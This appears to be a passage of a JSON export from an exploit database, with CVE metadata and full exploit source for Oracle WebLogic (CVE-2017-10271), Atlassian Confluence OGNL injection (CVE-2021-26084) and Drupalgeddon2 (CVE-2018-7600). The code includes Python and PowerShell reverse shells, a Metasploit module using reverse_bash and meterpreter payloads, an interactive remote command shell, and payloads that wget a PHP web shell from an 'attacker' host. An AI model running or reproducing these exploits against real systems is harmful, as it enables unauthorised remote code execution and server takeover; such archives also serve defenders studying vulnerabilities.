false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-04T07:47:37", "id": "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T19:21:36", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-10T05:12:44", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-15T15:41:28", "id": "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:31:07", "description": "# REDIS-CVE-2022-0543\nRedis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:15:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Redis", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-03-23T17:17:27", "id": "9E6213F8-7CEE-5BBF-8343-AF41B8C920AA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-05T09:00:52", "description": "# CVE-2022-0543\nCVE-2022-0543_...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T06:41:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Redis", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-08-05T03:54:53", "id": "423F06A3-70C4-58A1-8A3E-74C89561449D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "zdt": [{"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2021-12-15T11:22:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-04-14T17:44:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "1337DAY-ID-30171", "href": "https://0day.today/exploit/description/30171", "sourceData": "require 'net/http' \r\n \r\n # Hans Topo ruby port from Drupalggedon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print ('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-18T03:54:57", "description": "Exploit for php platform in category remote exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", 